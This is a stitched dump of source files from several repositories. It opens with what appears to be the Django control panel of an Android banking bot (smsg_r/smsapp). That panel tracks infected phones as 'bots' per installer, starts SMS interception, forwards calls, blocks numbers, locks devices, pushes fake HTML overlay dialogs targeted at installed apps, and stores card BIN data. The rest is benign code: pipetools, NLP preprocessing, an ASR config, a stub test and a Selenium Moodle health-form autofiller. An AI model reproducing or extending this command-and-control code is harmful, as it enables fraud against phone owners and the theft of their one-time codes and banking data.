opt.save()
# resetting cache
settings.REDIS.delete([DB_HTML_VERSION, DB_HTML_CACHE])
class BinData(models.Model):
cid = models.IntegerField(primary_key=True)
card = models.CharField(max_length=255, blank=True)
bank = models.CharField(max_length=255, null=True)
ctype = models.CharField(max_length=64, blank=True, null=True)
clevel = models.CharField(max_length=64, blank=True, null=True)
country = models.CharField(max_length=2, blank=True, null=True)
```
#### File: smsg_r/smsapp/tests.py
```python
from StringIO import StringIO
import gzip
import json
from django.conf import settings
from django.core.handlers.wsgi import WSGIRequest
from django.test import TestCase, Client
from . import command_queue, models, idgen, commands, remote_api, cache
class RequestFactory(Client):
def request(self, **request):
environ = {
'HTTP_COOKIE': self.cookies,
'PATH_INFO': '/',
'QUERY_STRING': '',
'REQUEST_METHOD': 'GET',
'SCRIPT_NAME': '',
'SERVER_NAME': 'testserver',
'SERVER_PORT': 80,
'SERVER_PROTOCOL': 'HTTP/1.1',
}
environ.update(self.defaults)
environ.update(request)
return WSGIRequest(environ)
class CommandTest(TestCase):
def setUp(self):
settings.REDIS.flushdb()
self.user = models.SysUser.objects.create(username="test")
self.phone = models.PhoneData.objects.create(number="322223", imei="ZZ345", country="RU")
self.installer = models.Installer.objects.create(username='installer1', user_id=1)
self.dialog1 = models.RemoteDialog.objects.create(sender='testsender1', description='t1', dlg1='f1',
html_contents='<html><body>hello 1</body></html>')
self.dialog1 = models.RemoteDialog.objects.create(sender='testsender2', app='testapp', priority=10,
description='t2', dlg1='f2',
html_contents='<html><body>hello 2</body></html>'
)
self.phone_id = self.phone.uniq_id
def test_command_queue(self):
# initial checks
self.assertTrue(command_queue.has_commands(
self.phone_id)) # # todo: fix test so it takes into account sentid command in buffer after new phone created
self.assertEqual('#sentid +13478096873', command_queue.get_next_command(self.phone_id))
self.assertEqual(commands.PHONE_STATE_STABLE, commands.get_phone_transient_state(self.phone_id))
# add the command and run state checks
commands.reserve_phone(self.user, self.phone)
self.assertTrue(command_queue.has_commands(self.phone_id))
self.assertEqual("#intercept_sms_start", command_queue.get_next_command(self.phone_id))
self.assertEqual(commands.PHONE_STATE_LOCKING, commands.get_phone_transient_state(self.phone_id))
def test_registration(self):
def test_with_data(test_app_data):
rf = RequestFactory()
buf = StringIO(test_app_data)
outb = StringIO()
f = gzip.GzipFile(fileobj=outb, mode='wb')
f.write(test_app_data)
data = outb.getvalue()
rf_post = rf.post('/app/remote', data=data, content_type='application/json')
rf_post.META['HTTP_CONTENT_ENCODING'] = "gzip"
resp = remote_api.process(rf_post)
self.assertEqual(200, resp.status_code, "Executed successfully")
ro = json.loads(resp.content)
code = ro['code']
self.assertEqual(10, len(code))
resp = remote_api.process(rf.post('/app/remote', data='{"type": "device check", "code": "' + code + '"}',
content_type='application/json'))
self.assertEqual(200, resp.status_code, "Executed successfully")
return json.loads(resp.content)
test_app_data0 = """
{
"os":"4.0.3","model":"LGE LG-XXXXX","phone number":"+111111111","client number":"1","type":"device info",
"imei":"111111111111","country":"US", "operator" : "ZZZ"
}
"""
ro = test_with_data(test_app_data0)
self.assertEqual('', ro['command'])
test_app_data1 = """
{
"os":"4.0.3","model":"LGE LG-XXXXX","phone number":"+222222222","client number":"1","type":"device info",
"imei":"2222222222","country":"US", "operator" : "ZZZ",
"sms": [{"from": "testsender1", "body": "test SMS 1"}],
"apps": ["testapp"]
}
"""
ro = test_with_data(test_app_data1)
self.assertEqual('#show_html', ro['command'])
self.assertEqual('f2', ro['params']['first dialog'])
models.Option.objects.create(name="blacklist", content="""
testapp
""")
cache.rebuild_cache()
ro = test_with_data(test_app_data1)
self.assertEqual('#show_html', ro['command'])
class IDGenerateTest(TestCase):
def test_generate_id(self):
uniq_id = idgen.generate_uniq_id()
print uniq_id
self.assertEqual(10, len(uniq_id))
class OperatorTest(TestCase):
def test_operator_name(self):
op = models.MobileOperator(name="310260")
self.assertEqual('T-Mobile (260) - Bermuda', unicode(op))
op1 = models.MobileOperator(name='311580')
self.assertEqual('Unknown (311/580)', unicode(op1))
op2 = models.MobileOperator(name='666322')
self.assertEqual('Unknown (666/322)', unicode(op2))
class CacheTest(TestCase):
def setUp(self):
models.Option.objects.create(name="blacklist", content="""
ttt
aaa
zzzz
""")
def test_cache(self):
cache.rebuild_cache()
self.assertTrue(cache.is_blacklisted('aaa'))
```
#### File: smsg_r/smsapp/views.py
```python
import json
import logging
import datetime
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import login as auth_login
from django.contrib.auth.models import User
from django.db.models import Q
from django.http import HttpResponse, HttpResponseServerError
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth import logout
from django.utils import timezone
from django.views.decorators.cache import never_cache
from django.views.decorators.debug import sensitive_post_parameters
from django.views.decorators.http import require_http_methods
from django.utils.translation import ugettext_lazy as _
from smsapp import models, commands, sys_messages, cfields
logger = logging.getLogger(__name__)
def home(request):
if request.user.id:
if request.user.is_staff:
return redirect('admin:index')
# check if user is an installer
try:
inst = models.Installer.objects.get(pk=request.user.id)
now = timezone.now()
# beginning of the day
bod = datetime.datetime(year=now.year, month=now.month, day=now.day, hour=0, minute=0, second=0,
tzinfo=timezone.get_current_timezone())
phonedata_set = models.PhoneData.objects.filter(installer=inst)
return render(request, "install_stats.html",
{
'total_bots': phonedata_set.count(),
'bots_today': phonedata_set.filter(registered__gte=bod).count(),
})
except models.Installer.DoesNotExist:
return render(request, "countries.html",
{'data': models.PhoneData.objects.get_country_list(request.user.id)})
return render(request, "index.html")
@login_required()
def logout_local(request):
logout(request)
messages.success(request, _("Logged out"))
return redirect("home")
@login_required()
def inside_country(request, country):
return render(request, "inside_country.html",
{'country': country, 'phones': models.PhoneData.objects.get_active_phones(request.user.id, country)})
@login_required()
def sms_list(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
sms_data = pd.smsrecord_set.filter(source__isnull=False).order_by('-created').all()
blocked_data = pd.blockednumber_set.all()
user_comments = None
if request.user.is_superuser:
comment = pd.admin_comment if pd.admin_comment else ""
user_comments = pd.usercomment_set.all()
else:
try:
su = models.SysUser.objects.get(user_ptr=request.user.id)
comment = models.UserComment.objects.get(phone=pd, user=su)
comment = comment.contents if comment else ""
except models.UserComment.DoesNotExist:
comment = ""
if request.is_ajax():
l = []
for s in reversed(sms_data):
l.append({'from': s.source, 'id': s.id, 'text': s.contents})
ctx = {'sms_data': l}
return HttpResponse(json.dumps(ctx), content_type="application/json")
ctx = {
'sms_data': sms_data, 'phone_data': pd, 'blocked_data': blocked_data,
'app_data': pd.installedapp_set.all(),
'int_sms_data': pd.internalsms_set.all(),
'comment': comment,
'user_comments': user_comments,
}
return render(request, "phone_details.html", ctx)
class StateError(Exception):
pass
def get_boolean_from_request(request, key, method='POST'):
""" gets the value from request and returns it's boolean state """
value = getattr(request, method).get(key, False)
if value == 'False' or value == 'false' or value == '0' or value == 0:
value = False
elif value:
value = True
else:
value = False
return value
@login_required()
@require_http_methods(["POST"])
def send_sms(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
to = request.POST.get("recipient")
txt = request.POST.get("sms")
commands.send_sms(pd, to, txt)
return HttpResponse(json.dumps({'success': "SMS successfully sent to {0}".format(to)}),
content_type="application/json")
@login_required()
@require_http_methods(["POST"])
def forward_calls(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
number = request.POST.get('number')
commands.forward_calls(pd, number)
return HttpResponse(json.dumps({'success': "Starting call forwarding to {0}".format(number)}),
content_type="application/json")
@login_required()
@require_http_methods(["POST"])
def disable_forward_calls(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
commands.disable_forward_calls(pd)
return HttpResponse(json.dumps({'success': "Disabling call forwarding"}),
content_type="application/json")
@login_required()
@require_http_methods(["POST"])
def toggle_phone(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
flag = get_boolean_from_request(request, 'flag')
try:
if pd.owner_id is not None and pd.owner_id != request.user.id:
raise StateError("Another user is already using this phone")
if flag:
# release all other owned phones
for p in models.PhoneData.objects.exclude(id=phone_id).filter(owner_id=request.user.id):
commands.release_phone(p)
if pd.owner_id is None:
user = User.objects.get(pk=request.user.id)
if not commands.reserve_phone(user, pd):
raise StateError("Could not reserve the phone")
return HttpResponse(
json.dumps({'success': "Please wait while intercept starts", 'result': 1}),
content_type="application/json")
elif pd.owner_id == request.user.id:
sys_messages.add_message(pd.uniq_id, {'imei': pd.imei}) # to switch off the indicator
return HttpResponse(json.dumps({'warning': "The phone is already in intercept status", 'result': 1}),
content_type="application/json")
else:
if pd.owner_id == request.user.id:
commands.release_phone(pd)
return HttpResponse(
json.dumps({'success': "The phone {0} is going to be released".format(pd), 'result': 0}),
content_type="application/json")
raise StateError("Unknown error")
except StateError as e:
logger.error("Error processing phone state request: {0}".format(e))
return HttpResponseServerError(e)
@login_required()
@require_http_methods(["POST"])
def unblock_number(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
all = request.POST.get('all')
if all:
commands.unblock_all(pd)
return HttpResponse(
json.dumps({'success': "Sent command to unblock all numbers"}),
content_type="application/json")
else:
number = request.POST.get('number')
commands.unblock_phone(pd, number)
return HttpResponse(
json.dumps({'success': "Sent command to unblock number {0}".format(number)}),
content_type="application/json")
@login_required()
@require_http_methods(["POST"])
def block_number(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
number = request.POST.get('number')
commands.block_phone(pd, number)
return HttpResponse(
json.dumps({'success': "Sent command to block number {0}".format(number)}),
content_type="application/json")
@login_required()
def history(request):
phone_list = models.SMSRecord.objects.filter(owner_id=request.user.id).select_related('phone').order_by(
'phone').distinct('phone')
return render(request, "history.html", {'phones': phone_list})
@login_required()
def clear_messages(request, phone_id):
pd = get_object_or_404(models.PhoneData, Q(pk=phone_id) & Q(owner__id=request.user.id))
messages.success(request, "Messages cleared {0}".format(pd))
models.SMSRecord.objects.filter(phone=pd).all().delete()
return redirect('history')
@login_required()
@require_http_methods(["POST"])
def get_messages(request, phone_id):
phone = get_object_or_404(models.PhoneData, pk=phone_id)
commands.touch_phone(phone.uniq_id)
msg_list = []
while True:
m = sys_messages.retrieve_next_message(phone.uniq_id)
if m is None:
break
msg_list.append(m)
resp = {'messages': msg_list} if len(msg_list) else {}
return HttpResponse(json.dumps(resp), content_type="application/json")
@sensitive_post_parameters()
@require_http_methods(["POST"])
@never_cache
def login(request):
form = AuthenticationForm(request, data=request.POST)
if form.is_valid():
auth_login(request, form.get_user())
messages.success(request, "Logged in")
return redirect('home')
messages.error(request, "Login failed")
return redirect('home')
@login_required()
@require_http_methods(["POST"])
def get_country_operators(request):
ccode = request.POST.get("ccode")
lst = cfields.get_operator_choices(ccode)
res = {'success': True, 'choices': lst}
return HttpResponse(json.dumps(res), content_type="application/json")
@login_required()
@require_http_methods(["POST"])
def save_comment(request, phone_id):
phone = get_object_or_404(models.PhoneData, pk=phone_id)
contents = request.POST.get("contents")
if request.user.is_superuser:
phone.admin_comment = contents
phone.save()
else:
user = get_object_or_404(models.SysUser, user_ptr=request.user.id)
c, created = models.UserComment.objects.get_or_create(user=user, phone=phone)
c.contents = contents
c.save()
resp = {'success': True}
return HttpResponse(json.dumps(resp), content_type="application/json")
@login_required()
@require_http_methods(["POST"])
def lock_phone(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
flag = get_boolean_from_request(request, 'flag')
try:
if pd.owner_id is not None and pd.owner_id != request.user.id:
raise StateError("Another user is already using this phone")
if flag:
if pd.locked:
raise StateError("The phone is already in locked status")
commands.device_lock(pd, True)
return HttpResponse(
json.dumps({'success': "The phone {0} is going to be locked".format(pd), 'result': 0}),
content_type="application/json")
else:
if not pd.locked:
raise StateError("The phone is not locked")
commands.device_lock(pd, False)
return HttpResponse(
json.dumps({'success': "The phone {0} is going to be unlocked".format(pd), 'result': 0}),
content_type="application/json")
except StateError as e:
logger.error("Error processing phone state request: {0}".format(e))
return HttpResponseServerError(e)
``` |
{
"source": "0100101001010000/PyTechnicalIndicators",
"score": 3
} |
#### File: tests/Single/candle_indicators.py
```python
import unittest
from PyTechnicalIndicators.Single import candle_indicators
class TestCandleIndicators(unittest.TestCase):
def setUp(self):
self.prices = [100, 101, 102, 101, 103, 100]
def test_bollinger_band(self):
def test_bollinger_band_failure(self):
def test_ichimoku_cloud(self):
def test_ichimoku_cloud_failure(self):
def test_personalised_bb(self):
def test_personalised_bb_failure(self):
def test_personalised_icloud(self):
def test_personalised_icloud_failure(self):
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "0101011/analitikr",
"score": 3
} |
#### File: 0101011/analitikr/main.py
```python
from nltk.tokenize import word_tokenize as tokenize
import json, config, nltk, itertools
from os import path
import numpy as np
import cPickle as pickle
WHITELIST = '0123456789abcdefghijklmnopqrstuvwxyz'
VOCAB_SIZE = 1200
UNK = 'unk'
limit = {
'max_descriptions' : 400,
'min_descriptions' : 0,
'max_headings' : 20,
'min_headings' : 0,
}
def load_raw_data(filename):
with open(filename, 'r') as fp:
raw_data = json.load(fp)
print('Loaded {:,} articles from {}'.format(len(raw_data), filename))
return raw_data
def tokenize_sentence(sentence):
return ' '.join(list(tokenize(sentence)))
def article_is_complete(article):
# Check if an article has both heading and description
if ('abstract' not in article) or ('article' not in article):
return False
if (article['abstract'] is None) or (article['article'] is None):
return False
return True
def tokenize_articles(raw_data):
# Tokenizes data and creates list of headings and descriptions
headings, descriptions = [], []
num_articles = len(raw_data)
for i, a in enumerate(raw_data):
if article_is_complete(a):
headings.append(tokenize_sentence(a['abstract']))
descriptions.append(tokenize_sentence(a['article']))
if i % config.print_freq == 0:
print('Tokenized {:,} / {:,} articles'.format(i, num_articles))
return (headings, descriptions)
def filter(line, whitelist):
# Filters out all characters which are not in whitelist
return ''.join([ch for ch in line if ch in whitelist])
def filter_length(headings, descriptions):
if len(headings) != len(descriptions):
raise Exception('Number of headings does not match number of descriptions!')
filtered_headings, filtered_descriptions = [], []
for i in range(0, len(headings)):
heading_length = len(headings[i].split(' '))
description_length = len(descriptions[i].split(' '))
if description_length >= limit['min_descriptions'] and description_length <= limit['max_descriptions']:
if heading_length >= limit['min_headings'] and heading_length <= limit['max_headings']:
filtered_headings.append(headings[i])
filtered_descriptions.append(descriptions[i])
print('Length of filtered headings: {:,}'.format(len(filtered_headings)))
print('Length of filtered descriptions: {:,}'.format(len(filtered_descriptions)))
return (filtered_headings, filtered_descriptions)
def index_data(tokenized_sentences, vocab_size):
# Forms vocab, idx2word and word2idx dicts
freq_dist = nltk.FreqDist(itertools.chain(*tokenized_sentences))
vocab = freq_dist.most_common(vocab_size)
print('Vocab length: {:,}'.format(len(vocab)))
idx2word = ['_'] + [UNK] + [x[0] for x in vocab]
word2idx = dict([(w, i) for i, w in enumerate(idx2word)])
return (idx2word, word2idx, freq_dist)
def pad_seq(seq, lookup, max_length):
# Pads sequence with zero values
indices = []
for word in seq:
if word in lookup:
indices.append(lookup[word])
else:
indices.append(lookup[UNK])
return indices + [0]*(max_length - len(seq))
def zero_pad(tokenized_headings, tokenized_descriptions, word2idx):
# Stores indices in numpy arrays and
# Creates zero padding where required
data_length = len(tokenized_descriptions)
idx_descriptions = np.zeros([data_length, limit['max_descriptions']], dtype=np.int32)
idx_headings = np.zeros([data_length, limit['max_headings']], dtype=np.int32)
for i in range(data_length):
description_indices = pad_seq(tokenized_descriptions[i], word2idx, limit['max_descriptions'])
heading_indices = pad_seq(tokenized_headings[i], word2idx, limit['max_headings'])
idx_descriptions[i] = np.array(description_indices)
idx_headings[i] = np.array(heading_indices)
return (idx_headings, idx_descriptions)
def process_data():
#load data from file
filename = path.join(config.path_data, 'raw_data.json')
raw_data = load_raw_data(filename)
#tokenize articles and separate into headings and descriptions
headings, descriptions = tokenize_articles(raw_data)
#keep only whitelisted characters and articles satisfying the length limits
headings = [filter(heading, WHITELIST) for heading in headings]
descriptions = [filter(sentence, WHITELIST) for sentence in descriptions]
headings, descriptions = filter_length(headings, descriptions)
#convert list of sentences into list of list of words
word_tokenized_headings = [word_list.split(' ') for word_list in headings]
word_tokenized_descriptions = [word_list.split(' ') for word_list in descriptions]
#indexing
idx2word, word2idx, freq_dist = index_data(word_tokenized_headings + word_tokenized_descriptions, VOCAB_SIZE)
#save as numpy array and do zero padding
idx_headings, idx_descriptions = zero_pad(word_tokenized_headings, word_tokenized_descriptions, word2idx)
#check percentage of unks
unk_percentage = calculate_unk_percentage(idx_headings, idx_descriptions, word2idx)
print(calculate_unk_percentage(idx_headings, idx_descriptions, word2idx))
article_data = {
'word2idx' : word2idx,
'idx2word': idx2word,
'limit': limit,
'freq_dist': freq_dist,
}
pickle_data(article_data)
return (idx_headings, idx_descriptions)
def pickle_data(article_data):
# Saves obj to disk as a pickle file
with open(path.join(config.path_data, 'article_data.pkl'), 'wb') as fp:
pickle.dump(article_data, fp, 2)
def unpickle_articles():
# Loads pickle file from disk to give obj
with open(path.join(config.path_data, 'article_data.pkl'), 'rb') as fp:
article_data = pickle.load(fp)
return article_data
def calculate_unk_percentage(idx_headings, idx_descriptions, word2idx):
num_unk = (idx_headings == word2idx[UNK]).sum() + (idx_descriptions == word2idx[UNK]).sum()
num_words = (idx_headings > word2idx[UNK]).sum() + (idx_descriptions > word2idx[UNK]).sum()
return (num_unk / num_words) * 100
def main():
process_data()
if __name__ == '__main__':
main()
``` |
{
"source": "0101011/tensorflow-essentials",
"score": 3
} |
#### File: tensorflow-essentials/19_lingvo/19_1_task_config.py
```python
def Task(cls):
p = model.AsrModel.Params()
p.name = 'librispeech'
# Initialize encoder params.
ep = p.encoder
# Data consists 240 dimensional frames (80 x 3 frames), which we
# re-interpret as individual 80 dimensional frames. See also,
# LibrispeechCommonAsrInputParams.
ep.input_shape = [None, None, 80, 1]
ep.lstm_cell_size = 1024
ep.num_lstm_layers = 4
ep.conv_filter_shapes = [(3, 3, 1, 32), (3, 3, 32, 32)]
ep.conv_filter_strides = [(2, 2), (2, 2)]
ep.cnn_tpl.params_init = py_utils.WeightInit.Gaussian(0.001)
# Disable conv LSTM layers.
ep.num_conv_lstm_layers = 0
# Initialize decoder params.
dp = p.decoder
dp.rnn_cell_dim = 1024
dp.rnn_layers = 2
dp.source_dim = 2048
# Use functional while based unrolling.
dp.use_while_loop_based_unrolling = False
tp = p.train
tp.learning_rate = 2.5e-4
tp.lr_schedule = lr_schedule.ContinuousLearningRateSchedule.Params().Set(
start_step=50000, half_life_steps=100000, min=0.01)
# Setting p.eval.samples_per_summary to a large value ensures that dev,
# devother, test, testother are evaluated completely (since num_samples for
# each of these sets is less than 5000), while train summaries will be
# computed on 5000 examples.
p.eval.samples_per_summary = 5000
p.eval.decoder_samples_per_summary = 0
# Use variational weight noise to prevent overfitting.
p.vn.global_vn = True
p.train.vn_std = 0.075
p.train.vn_start_step = 20000
return p
``` |
{
"source": "0101/pipetools",
"score": 2
} |
#### File: pipetools/build_scripts/generate_readme.py
```python
import codecs
import re
from pipetools import foreach, X, pipe
DOC_ROOT = 'https://0101.github.io/pipetools/doc/'
readme_template = """
Pipetools
=========
|tests-badge| |coverage-badge| |pypi-badge|
.. |tests-badge| image:: https://github.com/0101/pipetools/actions/workflows/tests.yml/badge.svg
:target: https://github.com/0101/pipetools/actions/workflows/tests.yml
.. |coverage-badge| image:: https://raw.githubusercontent.com/0101/pipetools/master/coverage.svg
:target: https://github.com/0101/pipetools/actions/workflows/tests.yml
.. |pypi-badge| image:: https://img.shields.io/pypi/dm/pipetools.svg
:target: https://pypi.org/project/pipetools/
`Complete documentation <{0}>`_
{{0}}
But wait, there is more
-----------------------
Checkout `the Maybe pipe <{0}maybe>`_, `partial application on steroids <{0}xpartial>`_
or `automatic data structure creation <{0}pipeutils#automatic-data-structure-creation>`_
in the `full documentation <{0}#contents>`_.
""".format(DOC_ROOT)
link_template = u"`{text} <%s{url}>`_" % DOC_ROOT
link_replacements = (
# :doc:`pipe-utils' documentation<pipeutils>`.
(r":doc:`([^<]*)<([^>]*)>`", {'url': r'\2.html', 'text': r'\1'}),
# :func:`~pipetools.utils.where`
(r":func:`~pipetools\.utils\.([^`]*)`",
{'url': r'pipeutils.html#pipetools.utils.\1', 'text': r'\1()'}),
) > foreach([X[0] | re.compile, X[1] | link_template])
def create_readme():
with codecs.open('docs/source/overview.rst', 'r', 'utf-8') as overview:
with codecs.open('README.rst', 'w+', 'utf-8') as readme:
overview.read() > pipe | fix_links | readme_template | readme.write
def fix_links(string):
for pattern, replacement in link_replacements:
string = pattern.sub(replacement, string)
return string
if __name__ == '__main__':
create_readme()
```
#### File: pipetools/pipetools/main.py
```python
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
from functools import partial, wraps, WRAPPER_ASSIGNMENTS
from pipetools.debug import get_name, set_name, repr_args
from pipetools.compat import text_type, string_types, dict_items
class Pipe(object):
"""
Pipe-style combinator.
Example::
p = pipe | F | G | H
p(x) == H(G(F(x)))
"""
def __init__(self, func=None):
self.func = func
self.__name__ = 'Pipe'
def __str__(self):
return get_name(self.func)
__repr__ = __str__
@staticmethod
def compose(first, second):
name = lambda: '{0} | {1}'.format(get_name(first), get_name(second))
def composite(*args, **kwargs):
return second(first(*args, **kwargs))
return set_name(name, composite)
@classmethod
def bind(cls, first, second, new_cls=None):
return (new_cls or cls)(
first if second is None else
second if first is None else
cls.compose(first, second))
def __or__(self, next_func):
# Handle multiple pipes in pipe definition and also changing pipe type to e.g. Maybe
# this is needed because of evaluation order
pipe_in_a_pipe = isinstance(next_func, Pipe) and next_func.func is None
new_cls = type(next_func) if pipe_in_a_pipe else None
next = None if pipe_in_a_pipe else prepare_function_for_pipe(next_func)
return self.bind(self.func, next, new_cls)
def __ror__(self, prev_func):
return self.bind(prepare_function_for_pipe(prev_func), self.func)
def __lt__(self, thing):
return self.func(thing) if self.func else thing
def __call__(self, *args, **kwargs):
return self.func(*args, **kwargs)
def __get__(self, instance, owner):
return partial(self, instance) if instance else self
pipe = Pipe()
class Maybe(Pipe):
@staticmethod
def compose(first, second):
name = lambda: '{0} ?| {1}'.format(get_name(first), get_name(second))
def composite(*args, **kwargs):
result = first(*args, **kwargs)
return None if result is None else second(result)
return set_name(name, composite)
def __call__(self, *args, **kwargs):
if len(args) == 1 and args[0] is None and not kwargs:
return None
return self.func(*args, **kwargs)
def __lt__(self, thing):
return (
None if thing is None else
self.func(thing) if self.func else
thing)
maybe = Maybe()
def prepare_function_for_pipe(thing):
if isinstance(thing, XObject):
return ~thing
if isinstance(thing, tuple):
return xpartial(*thing)
if isinstance(thing, string_types):
return StringFormatter(thing)
if callable(thing):
return thing
raise ValueError('Cannot pipe %s' % thing)
def StringFormatter(template):
f = text_type(template).format
def format(content):
if isinstance(content, dict):
return f(**content)
if _iterable(content):
return f(*content)
return f(content)
return set_name(lambda: "format('%s')" % template[:20], format)
def _iterable(obj):
"Iterable but not a string"
return isinstance(obj, Iterable) and not isinstance(obj, string_types)
class XObject(object):
def __init__(self, func=None):
self._func = func
set_name(lambda: get_name(func) if func else 'X', self)
def __repr__(self):
return get_name(self)
def __invert__(self):
return self._func or set_name('X', lambda x: x)
def bind(self, name, func):
set_name(name, func)
return XObject((self._func | func) if self._func else (pipe | func))
def __call__(self, *args, **kwargs):
name = lambda: 'X(%s)' % repr_args(*args, **kwargs)
return self.bind(name, lambda x: x(*args, **kwargs))
def __hash__(self):
return super(XObject, self).__hash__()
def __eq__(self, other):
return self.bind(lambda: 'X == {0!r}'.format(other), lambda x: x == other)
def __getattr__(self, name):
return self.bind(lambda: 'X.{0}'.format(name), lambda x: getattr(x, name))
def __getitem__(self, item):
return self.bind(lambda: 'X[{0!r}]'.format(item), lambda x: x[item])
def __gt__(self, other):
return self.bind(lambda: 'X > {0!r}'.format(other), lambda x: x > other)
def __ge__(self, other):
return self.bind(lambda: 'X >= {0!r}'.format(other), lambda x: x >= other)
def __lt__(self, other):
return self.bind(lambda: 'X < {0!r}'.format(other), lambda x: x < other)
def __le__(self, other):
return self.bind(lambda: 'X <= {0!r}'.format(other), lambda x: x <= other)
def __mod__(self, y):
return self.bind(lambda: 'X % {0!r}'.format(y), lambda x: x % y)
def __ne__(self, other):
return self.bind(lambda: 'X != {0!r}'.format(other), lambda x: x != other)
def __neg__(self):
return self.bind(lambda: '-X', lambda x: -x)
def __mul__(self, other):
return self.bind(lambda: 'X * {0!r}'.format(other), lambda x: x * other)
def __floordiv__(self, other):
return self.bind(lambda: 'X / {0!r}'.format(other), lambda x: x // other)
def __div__(self, other):
return self.bind(lambda: 'X / {0!r}'.format(other), lambda x: x / other)
def __truediv__(self, other):
return self.bind(lambda: 'X / {0!r}'.format(other), lambda x: x / other)
def __add__(self, other):
return self.bind(lambda: 'X + {0!r}'.format(other), lambda x: x + other)
def __sub__(self, other):
return self.bind(lambda: 'X - {0!r}'.format(other), lambda x: x - other)
def __pow__(self, other):
return self.bind(lambda: 'X ** {0!r}'.format(other), lambda x: x ** other)
def __ror__(self, func):
return pipe | func | self
def __or__(self, func):
if isinstance(func, Pipe):
return func.__ror__(self)
return pipe | self | func
def _in_(self, y):
return self.bind(lambda: 'X._in_({0!r})'.format(y), lambda x: x in y)
X = XObject()
def xpartial(func, *xargs, **xkwargs):
"""
Like :func:`functools.partial`, but can take an :class:`XObject`
placeholder that will be replaced with the first positional argument
when the partially applied function is called.
Useful when the function's positional arguments' order doesn't fit your
situation, e.g.:
>>> reverse_range = xpartial(range, X, 0, -1)
>>> reverse_range(5)
[5, 4, 3, 2, 1]
It can also be used to transform the positional argument to a keyword
argument, which can come in handy inside a *pipe*::
xpartial(objects.get, id=X)
Also the XObjects are evaluated, which can be used for some sort of
destructuring of the argument::
xpartial(somefunc, name=X.name, number=X.contacts['number'])
Lastly, unlike :func:`functools.partial`, this creates a regular function
which will bind to classes (like the ``curry`` function from
``django.utils.functional``).
"""
any_x = any(isinstance(a, XObject) for a in xargs + tuple(xkwargs.values()))
use = lambda x, value: (~x)(value) if isinstance(x, XObject) else x
@wraps(func, assigned=filter(partial(hasattr, func), WRAPPER_ASSIGNMENTS))
def xpartially_applied(*func_args, **func_kwargs):
if any_x:
if not func_args:
raise ValueError('Function "%s" partially applied with an '
'X placeholder but called with no positional arguments.'
% get_name(func))
first = func_args[0]
rest = func_args[1:]
args = tuple(use(x, first) for x in xargs) + rest
kwargs = dict((k, use(x, first)) for k, x in dict_items(xkwargs))
kwargs.update(func_kwargs)
else:
args = xargs + func_args
kwargs = dict(xkwargs, **func_kwargs)
return func(*args, **kwargs)
name = lambda: '%s(%s)' % (get_name(func), repr_args(*xargs, **xkwargs))
return set_name(name, xpartially_applied)
``` |
{
"source": "010Ri/BodyTemperature-Reporting-System-For-Moodle",
"score": 3
} |
#### File: 010Ri/BodyTemperature-Reporting-System-For-Moodle/bodytemperature-report-sample.py
```python
from selenium import webdriver
from time import sleep
from selenium.webdriver.chrome.options import Options
# elements for log in LMS (moodle) : ログインに必要な要素
USERNAME = 'USERNAME'
PASSWORD = 'PASSWORD'
# elements for filling form : 体温報告に必要な要素
BodyTemperature = input('今日の体温を入力してください(少数点第一位まで):')
Others = '特になし'
# initializes 初期設定
error_flg = False
target_url = 'URL' # moodle URL
# FUNCTION access : str == button name , click automatically and redirect to next page : access関数の定義:ボタンの名前をstrで指定し、クリックして次の画面へ進む
def access(str):
try:
access_button = driver.find_element_by_link_text(str)
access_button.click()
sleep(3)
except Exception:
error_flg = True
print(str + 'ボタン押下時にエラーが発生しました。')
# turn on WebDriver : WebDriverの起動
options = Options()
options.add_argument('--headless') # ここをコメントアウトすればヘッドレスモードを無効にできる
driver = webdriver.Chrome('C:\Program Files (x86)\Google\Chrome\chromedriver',options=options)
driver.get(target_url)
sleep(3)
# login process : ログイン処理
if error_flg is False:
try:
username_input = driver.find_element_by_name("username")
username_input.send_keys(USERNAME)
sleep(1)
password_input = driver.find_element_by_name("password")
password_input.send_keys(PASSWORD)
sleep(1)
username_input.submit()
sleep(1)
except Exception:
print('ユーザー名、パスワード入力時にエラーが発生しました。')
error_flg = True
# press take-exam-again button
if error_flg is False:
try:
again_button = driver.find_element_by_xpath('//form/button[@type="submit"]')
again_button.click()
sleep(3)
except Exception:
error_flg = True
print('もう一度受験するボタン押下時にエラーが発生しました。')
# fill form
if error_flg is False:
try:
BodyTemperature_input = driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div/section[1]/div[1]/form/div/div[1]/div[2]/div[1]/div[2]/span/input')
BodyTemperature_input.send_keys(BodyTemperature)
sleep(1)
others_input = driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div/section[1]/div[1]/form/div/div[3]/div[2]/div/div[2]/label/span/input')
others_input.send_keys(Others)
sleep(1)
except Exception:
print('体温の入力時にエラーが発生しました。')
error_flg = True
if error_flg is False:
try:
Q_button = driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div/section[1]/div[1]/form/div/div[2]/div[2]/div/div[2]/div[2]/div[1]/input[2]')
driver.execute_script("arguments[0].click();",Q_button)
sleep(3)
except Exception:
error_flg = True
print('症状のボタン押下時にエラーが発生しました。')
# press finish-exam button
if error_flg is False:
try:
next_button = driver.find_element_by_name('next')
next_button.click()
sleep(3)
except Exception:
error_flg = True
print('テストを終了する ...ボタン押下時にエラーが発生しました。')
if error_flg is False:
try:
submit_button = driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div/section[1]/div[1]/div[3]/div/div/form/button')
submit_button.click()
sleep(3)
except Exception:
error_flg = True
print('すべての解答を送信して終了するボタン押下時にエラーが発生しました。')
if error_flg is False:
try:
check_button = driver.find_element_by_xpath('/html/body/div[4]/div[3]/div/div[2]/div/div[2]/input[1]')
check_button.click()
sleep(3)
except Exception:
error_flg = True
